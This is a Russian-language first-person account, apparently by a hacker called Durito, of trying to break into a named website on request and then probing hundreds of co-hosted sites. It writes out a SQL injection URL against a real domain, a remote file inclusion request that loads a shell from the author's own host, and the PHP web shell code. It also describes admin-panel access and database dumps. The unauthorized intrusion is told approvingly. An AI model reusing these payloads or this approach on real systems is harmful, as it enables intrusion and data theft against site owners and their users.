special
  •  #StandWithUkraine Ukraine flag |
  • ~493690+1400
     Enemy losses on 817th day of War in Ukraine

  1. HOME
  2. Хакерство и защита
  3. Хакер (от англ. hack — разрубать)
  4. Статья о хакинге, но без традиционного happy end

This webpage has been robot translated, sorry for typos if any. To view the original content of the page, simply replace the translation subdomain with www in the address bar or use this link.

Статья о хакинге, но без традиционного happy end

 

Привет, ты навеное думаешь что это какая-то опечатка или прикол.
Совсем нет. Обычно хакеры пишут статьи с заголовками ""Как был взломан ..."
В этой статье речь пойдет тоже о хакинге, но без традиционного happy end. Хотя как знать...

Как-то на днях мне в асю стучит чел с предложением добыть ему доступ к одному ресурсу.
Делать мне было особо нечего и я согласился. Просмотрев данный им урл, я увидел немного интересной инфы:
http://www.russianspain.com/phpinfo.php
и соответсвенно:
http://www.russianspain.com/php.ini

Полазив по сайту, я нашел еще возможность выполнения sql-инъекции, но сообщения об ошибке не выводились, и я решил оставить это на потом.
Пробив ip сайта, я увидел что на нем числилось еще 400 с лишним сайтов. Я методично решил их перебирать, пока не найду бажный.
Несколько раз мне попадались форумы phpBB второй ветки, но sql-инъекция резалась во всех. Подменив куки я получил доступ к админкам, и сбекапил базы в надежде что один из паролей подойдет и к фтп.
Один раз попался Advanced Guestbook 2.2, инъкция для доступа к админке работала, но для доступа и редактирования template требовалось еще валидный параметр session, поэтому меня постоянно выбрасыло на страницу авторизации.
Было еще несколько сайтов с возможностью sql-инъекции, типа:
http://www.joehenke.com/gallery_view.php?galleryid=16+UNION+SELECT+1/*
но вытянуть из них что-то путное мне сразу не удалось.

Так длилось до того момента, пока я не набрел на up-glass.com, сайт компании "Унипак", производящей тару для алкогольной промышленности России.
Увидев что файлы инклудятся, я попытался подключить свой шелл на narod.ru:
http://up-glass.com/former.php?folder=http://durito.narod.ru/sh&cmd=ls

Сервер выдал сообщение об ошибке:
Warning: lmenu(): php_network_getaddresses: getaddrinfo failed: Temporary failure in name resolution in /home/upglass/public_html/func.php on line 40

Warning: lmenu(http://durito.narod.ru/sh/config.p): failed to open stream: Success in /home/upglass/public_html/func.php on line 40

Все стало сразу ясно, я быстро залил на свой сайт файл config.p вот с таким содержимым:
<?
echo "<DIV align=left><PRE>";
system($_GET['cmd']);
echo "</PRE></DIV>";
?>

и следующий запрос:
http://up-glass.com/former.php?folder=http://durito.narod.ru/&cmd=ls
уже выдал мне список файлов сайта

 

Но просматривать директории других юзеров я не мог, даже public_html был мне не доступен.

Ядро было свежим:
Linux cpanel05.gzo.com 2.6.11.11 #1 SMP Tue May 31 14:02:19 CDT 2005 i686 i686 i386 GNU/Linux
о руте можно было бы забыть.

Тогда я решил вернуться к sql-инъекции на www.russianspain.com. И только сейчас случайно бросил взляд на контент сайта.
Я увидел, что взляды создателей сайта относительно президента РФ и его политики очень близки моим. Прочитав статьи я твердо решил оставить один из последних свободных голосов оппозиции в покое.
Мало того, я отписал им о уязвимостях на сайте, и попросил вывесить баннер "Хватит Путина!".

Вот такая история.


Твой bug Durito.
_________________
EAT THE RICH!

Дата створення/оновлення: 25.05.2018